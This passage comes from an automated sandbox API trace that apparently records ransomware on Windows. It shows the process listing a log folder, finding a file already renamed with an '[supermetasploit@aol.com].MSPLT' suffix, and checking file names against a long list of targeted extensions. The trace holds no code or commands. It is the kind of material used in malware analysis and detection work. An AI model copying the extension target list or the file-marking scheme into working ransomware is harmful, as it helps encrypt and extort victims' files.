nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0167.283] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Logs", cAlternateFileName="")) returned 1 [0167.284] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0167.284] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent\\Logs") returned 1 [0167.284] lstrlenW (lpString="Logs") returned 4 [0167.284] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Logs") returned -1 [0167.284] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3e90058 [0167.284] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0167.284] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x58e47bf6, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x801ed8 [0167.284] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x58e47bf6, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.285] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58b2690b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58b2690b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58b4cce4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xa7de, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="DOWNLE~1.MSP")) returned 1 [0167.285] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 81 [0167.285] lstrlenW (lpString=".1cd") returned 4 [0167.285] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0167.285] lstrlenW (lpString=".3ds") returned 4 [0167.285] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0167.285] lstrlenW (lpString=".3fr") returned 4 [0167.285] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0167.285] lstrlenW (lpString=".3g2") returned 4 [0167.285] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0167.285] lstrlenW (lpString=".3gp") returned 4 [0167.285] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0167.285] lstrlenW (lpString=".7z") returned 3 [0167.285] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0167.285] lstrlenW (lpString=".accda") returned 6 [0167.285] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0167.285] lstrlenW (lpString=".accdb") returned 6 [0167.285] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0167.285] lstrlenW (lpString=".accdc") returned 6 [0167.285] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0167.285] lstrlenW (lpString=".accde") returned 6 [0167.285] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0167.285] lstrlenW (lpString=".accdt") returned 6 [0167.285] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0167.285] lstrlenW (lpString=".accdw") returned 6 [0167.285] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0167.286] lstrlenW (lpString=".adb") returned 4 [0167.286] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0167.286] lstrlenW (lpString=".adp") returned 4 [0167.286] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0167.286] lstrlenW (lpString=".ai") returned 3 [0167.286] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0167.286] lstrlenW (lpString=".ai3") returned 4 [0167.286] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0167.286] lstrlenW (lpString=".ai4") returned 4 [0167.286] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0167.286] lstrlenW (lpString=".ai5") returned 4 [0167.286] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0167.286] lstrlenW (lpString=".ai6") returned 4 [0167.286] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0167.286] lstrlenW (lpString=".ai7") returned 4 [0167.286] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0167.286] lstrlenW (lpString=".ai8") returned 4 [0167.286] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0167.286] lstrlenW (lpString=".anim") returned 5 [0167.286] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0167.286] lstrlenW (lpString=".arw") returned 4 [0167.286] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0167.286] lstrlenW (lpString=".as") returned 3 [0167.286] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0167.286] lstrlenW (lpString=".asa") returned 4 [0167.286] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0167.286] lstrlenW (lpString=".asc") returned 4 [0167.286] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0167.287] lstrlenW (lpString=".ascx") returned 5 [0167.287] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0167.287] lstrlenW (lpString=".asm") returned 4 [0167.287] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0167.287] lstrlenW (lpString=".asmx") returned 5 [0167.287] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0167.287] lstrlenW (lpString=".asp") returned 4 [0167.287] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0167.287] lstrlenW (lpString=".aspx") returned 5 [0167.287] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0167.287] lstrlenW (lpString=".asr") returned 4 [0167.287] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0167.287] lstrlenW (lpString=".asx") returned 4 [0167.287] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0167.287] lstrlenW (lpString=".avi") returned 4 [0167.287] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0167.287] lstrlenW (lpString=".avs") returned 4 [0167.287] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0167.287] lstrlenW (lpString=".backup") returned 7 [0167.287] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0167.287] lstrlenW (lpString=".bak") returned 4 [0167.287] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0167.287] lstrlenW (lpString=".bay") returned 4 [0167.287] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0167.287] lstrlenW (lpString=".bd") returned 3 [0167.287] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0167.287] lstrlenW (lpString=".bin") returned 4 [0167.288] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0167.288] lstrlenW (lpString=".bmp") returned 4 [0167.288] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0167.288] lstrlenW (lpString=".bz2") returned 4 [0167.288] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0167.288] lstrlenW (lpString=".c") returned 2 [0167.288] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0167.288] lstrlenW (lpString=".cdr") returned 4 [0167.288] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0167.288] lstrlenW (lpString=".cer") returned 4 [0167.288] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0167.288] lstrlenW (lpString=".cf") returned 3 [0167.288] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0167.288] lstrlenW (lpString=".cfc") returned 4 [0167.288] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0167.288] lstrlenW (lpString=".cfm") returned 4 [0167.288] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0167.288] lstrlenW (lpString=".cfml") returned 5 [0167.288] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0167.288] lstrlenW (lpString=".cfu") returned 4 [0167.288] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0167.288] lstrlenW (lpString=".chm") returned 4 [0167.288] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0167.288] lstrlenW (lpString=".cin") returned 4 [0167.288] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0167.288] lstrlenW (lpString=".class") returned 6 [0167.288] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0167.288] lstrlenW (lpString=".clx") returned 4 [0167.288] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0167.289] lstrlenW (lpString=".config") returned 7 [0167.289] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0167.289] lstrlenW (lpString=".cpp") returned 4 [0167.289] lstrcmpiW (lpString1=".cpp", lpString2="SPLT") returned -1 [0167.289] lstrlenW (lpString=".cr2") returned 4 [0167.289] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0167.289] lstrlenW (lpString=".crt") returned 4 [0167.289] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0167.289] lstrlenW (lpString=".crw") returned 4 [0167.289] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0167.289] lstrlenW (lpString=".cs") returned 3 [0167.289] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0167.289] lstrlenW (lpString=".css") returned 4 [0167.289] lstrcmpiW (lpString1=".css", lpString2="SPLT") returned -1 [0167.289] lstrlenW (lpString=".csv") returned 4 [0167.289] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0167.289] lstrlenW (lpString=".cub") returned 4 [0167.289] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0167.289] lstrlenW (lpString=".dae") returned 4 [0167.289] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0167.289] lstrlenW (lpString=".dat") returned 4 [0167.289] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0167.289] lstrlenW (lpString=".db") returned 3 [0167.289] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0167.289] lstrlenW (lpString=".dbf") returned 4 [0167.289] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0167.289] lstrlenW (lpString=".dbx") returned 4 [0167.289] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0167.290] lstrlenW (lpString=".dc3") returned 4 [0167.290] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0167.290] lstrlenW (lpString=".dcm") returned 4 [0167.290] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0167.290] lstrlenW (lpString=".dcr") returned 4 [0167.290] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0167.290] lstrlenW (lpString=".der") returned 4 [0167.290] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0167.290] lstrlenW (lpString=".dib") returned 4 [0167.290] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0167.290] lstrlenW (lpString=".dic") returned 4 [0167.290] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0167.290] lstrlenW (lpString=".dif") returned 4 [0167.290] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0167.290] lstrlenW (lpString=".divx") returned 5 [0167.290] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0167.290] lstrlenW (lpString=".djvu") returned 5 [0167.290] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0167.290] lstrlenW (lpString=".dng") returned 4 [0167.290] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0167.290] lstrlenW (lpString=".doc") returned 4 [0167.290] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0167.290] lstrlenW (lpString=".docm") returned 5 [0167.290] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0167.290] lstrlenW (lpString=".docx") returned 5 [0167.290] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0167.290] lstrlenW (lpString=".dot") returned 4 [0167.290] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0167.290] lstrlenW (lpString=".dotm") returned 5 [0167.291] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0167.291] lstrlenW (lpString=".dotx") returned 5 [0167.291] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0167.291] lstrlenW (lpString=".dpx") returned 4 [0167.291] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0167.291] lstrlenW (lpString=".dqy") returned 4 [0167.291] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0167.291] lstrlenW (lpString=".dsn") returned 4 [0167.291] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0167.291] lstrlenW (lpString=".dt") returned 3 [0167.291] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0167.291] lstrlenW (lpString=".dtd") returned 4 [0167.291] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0167.291] lstrlenW (lpString=".dwg") returned 4 [0167.291] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0167.291] lstrlenW (lpString=".dwt") returned 4 [0167.291] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0167.291] lstrlenW (lpString=".dx") returned 3 [0167.291] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0167.291] lstrlenW (lpString=".dxf") returned 4 [0167.291] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0167.291] lstrlenW (lpString=".edml") returned 5 [0167.291] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0167.291] lstrlenW (lpString=".efd") returned 4 [0167.291] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0167.292] lstrlenW (lpString=".elf") returned 4 [0167.292] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0167.292] lstrlenW (lpString=".emf") returned 4 [0167.292] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0167.292] lstrlenW (lpString=".emz") returned 4 [0167.292] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0167.292] lstrlenW (lpString=".epf") returned 4 [0167.292] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0167.292] lstrlenW (lpString=".eps") returned 4 [0167.292] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0167.292] lstrlenW (lpString=".epsf") returned 5 [0167.292] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0167.292] lstrlenW (lpString=".epsp") returned 5 [0167.292] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0167.292] lstrlenW (lpString=".erf") returned 4 [0167.292] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0167.292] lstrlenW (lpString=".exr") returned 4 [0167.292] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned -1 [0167.292] lstrlenW (lpString=".f4v") returned 4 [0167.292] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0167.292] lstrlenW (lpString=".fido") returned 5 [0167.292] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0167.292] lstrlenW (lpString=".flm") returned 4 [0167.292] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0167.292] lstrlenW (lpString=".flv") returned 4 [0167.292] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0167.292] lstrlenW (lpString=".frm") returned 4 [0167.292] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0167.293] lstrlenW (lpString=".fxg") returned 4 [0167.293] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0167.293] lstrlenW (lpString=".geo") returned 4 [0167.293] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0167.293] lstrlenW (lpString=".gif") returned 4 [0167.293] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0167.293] lstrlenW (lpString=".grs") returned 4 [0167.293] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0167.293] lstrlenW (lpString=".gz") returned 3 [0167.293] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0167.293] lstrlenW (lpString=".h") returned 2 [0167.293] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0167.293] lstrlenW (lpString=".hdr") returned 4 [0167.293] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0167.293] lstrlenW (lpString=".hpp") returned 4 [0167.293] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0167.293] lstrlenW (lpString=".hta") returned 4 [0167.293] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0167.293] lstrlenW (lpString=".htc") returned 4 [0167.293] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0167.293] lstrlenW (lpString=".htm") returned 4 [0167.293] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0167.293] lstrlenW (lpString=".html") returned 5 [0167.293] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0167.293] lstrlenW (lpString=".icb") returned 4 [0167.293] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0167.293] lstrlenW (lpString=".ics") returned 4 [0167.293] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0167.294] lstrlenW (lpString=".iff") returned 4 [0167.294] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0167.294] lstrlenW (lpString=".inc") returned 4 [0167.294] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0167.294] lstrlenW (lpString=".indd") returned 5 [0167.294] lstrcmpiW (lpString1=".indd", lpString2="MSPLT") returned -1 [0167.294] lstrlenW (lpString=".ini") returned 4 [0167.294] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0167.294] lstrlenW (lpString=".iqy") returned 4 [0167.294] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0167.294] lstrlenW (lpString=".j2c") returned 4 [0167.294] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0167.294] lstrlenW (lpString=".j2k") returned 4 [0167.294] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0167.294] lstrlenW (lpString=".java") returned 5 [0167.294] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0167.294] lstrlenW (lpString=".jp2") returned 4 [0167.294] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0167.294] lstrlenW (lpString=".jpc") returned 4 [0167.294] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0167.294] lstrlenW (lpString=".jpe") returned 4 [0167.294] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0167.294] lstrlenW (lpString=".jpeg") returned 5 [0167.294] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0167.294] lstrlenW (lpString=".jpf") returned 4 [0167.294] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0167.294] lstrlenW (lpString=".jpg") returned 4 [0167.294] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0167.295] lstrlenW (lpString=".jpx") returned 4 [0167.295] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0167.295] lstrlenW (lpString=".js") returned 3 [0167.295] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0167.295] lstrlenW (lpString=".jsf") returned 4 [0167.295] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0167.295] lstrlenW (lpString=".json") returned 5 [0167.295] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0167.295] lstrlenW (lpString=".jsp") returned 4 [0167.295] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0167.295] lstrlenW (lpString=".kdc") returned 4 [0167.295] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0167.295] lstrlenW (lpString=".kmz") returned 4 [0167.295] lstrcmpiW (lpString1=".kmz", lpString2="SPLT") returned -1 [0167.295] lstrlenW (lpString=".kwm") returned 4 [0167.295] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0167.295] lstrlenW (lpString=".lasso") returned 6 [0167.295] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0167.295] lstrlenW (lpString=".lbi") returned 4 [0167.295] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0167.295] lstrlenW (lpString=".lgf") returned 4 [0167.295] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0167.295] lstrlenW (lpString=".lgp") returned 4 [0167.295] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0167.295] lstrlenW (lpString=".log") returned 4 [0167.295] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0167.295] lstrlenW (lpString=".m1v") returned 4 [0167.295] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0167.295] lstrlenW (lpString=".m4a") returned 4 [0167.296] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0167.296] lstrlenW (lpString=".m4v") returned 4 [0167.296] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0167.296] lstrlenW (lpString=".max") returned 4 [0167.296] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0167.296] lstrlenW (lpString=".md") returned 3 [0167.296] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0167.296] lstrlenW (lpString=".mda") returned 4 [0167.296] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0167.296] lstrlenW (lpString=".mdb") returned 4 [0167.296] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0167.296] lstrlenW (lpString=".mde") returned 4 [0167.296] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0167.296] lstrlenW (lpString=".mdf") returned 4 [0167.296] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0167.296] lstrlenW (lpString=".mdw") returned 4 [0167.296] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0167.296] lstrlenW (lpString=".mef") returned 4 [0167.296] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0167.296] lstrlenW (lpString=".mft") returned 4 [0167.296] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0167.296] lstrlenW (lpString=".mfw") returned 4 [0167.296] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0167.296] lstrlenW (lpString=".mht") returned 4 [0167.296] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0167.296] lstrlenW (lpString=".mhtml") returned 6 [0167.296] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0167.296] lstrlenW (lpString=".mka") returned 4 [0167.297] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0167.297] lstrlenW (lpString=".mkidx") returned 6 [0167.297] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0167.297] lstrlenW (lpString=".mkv") returned 4 [0167.297] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0167.297] lstrlenW (lpString=".mos") returned 4 [0167.297] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0167.297] lstrlenW (lpString=".mov") returned 4 [0167.297] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0167.297] lstrlenW (lpString=".mp3") returned 4 [0167.297] lstrcmpiW (lpString1=".mp3", lpString2="SPLT") returned -1 [0167.297] lstrlenW (lpString=".mp4") returned 4 [0167.297] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0167.297] lstrlenW (lpString=".mpeg") returned 5 [0167.297] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0167.297] lstrlenW (lpString=".mpg") returned 4 [0167.297] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0167.297] lstrlenW (lpString=".mpv") returned 4 [0167.297] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0167.297] lstrlenW (lpString=".mrw") returned 4 [0167.297] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0167.297] lstrlenW (lpString=".msg") returned 4 [0167.297] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0167.297] lstrlenW (lpString=".mxl") returned 4 [0167.297] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0167.297] lstrlenW (lpString=".myd") returned 4 [0167.297] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0167.297] lstrlenW (lpString=".myi") returned 4 [0167.297] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0167.298] lstrlenW (lpString=".nef") returned 4 [0167.298] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0167.298] lstrlenW (lpString=".nrw") returned 4 [0167.298] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0167.298] lstrlenW (lpString=".obj") returned 4 [0167.298] lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0167.298] lstrlenW (lpString=".odb") returned 4 [0167.298] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0167.298] lstrlenW (lpString=".odc") returned 4 [0167.298] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0167.298] lstrlenW (lpString=".odm") returned 4 [0167.298] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0167.298] lstrlenW (lpString=".odp") returned 4 [0167.298] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0167.298] lstrlenW (lpString=".ods") returned 4 [0167.298] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0167.298] lstrlenW (lpString=".oft") returned 4 [0167.298] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0167.298] lstrlenW (lpString=".one") returned 4 [0167.298] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0167.298] lstrlenW (lpString=".onepkg") returned 7 [0167.298] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0167.298] lstrlenW (lpString=".onetoc2") returned 8 [0167.298] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0167.298] lstrlenW (lpString=".opt") returned 4 [0167.298] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0167.298] lstrlenW (lpString=".oqy") returned 4 [0167.298] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0167.299] lstrlenW (lpString=".orf") returned 4 [0167.299] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0167.299] lstrlenW (lpString=".p12") returned 4 [0167.299] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0167.299] lstrlenW (lpString=".p7b") returned 4 [0167.299] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0167.299] lstrlenW (lpString=".p7c") returned 4 [0167.299] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0167.299] lstrlenW (lpString=".pam") returned 4 [0167.299] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0167.299] lstrlenW (lpString=".pbm") returned 4 [0167.299] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0167.299] lstrlenW (lpString=".pct") returned 4 [0167.299] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0167.299] lstrlenW (lpString=".pcx") returned 4 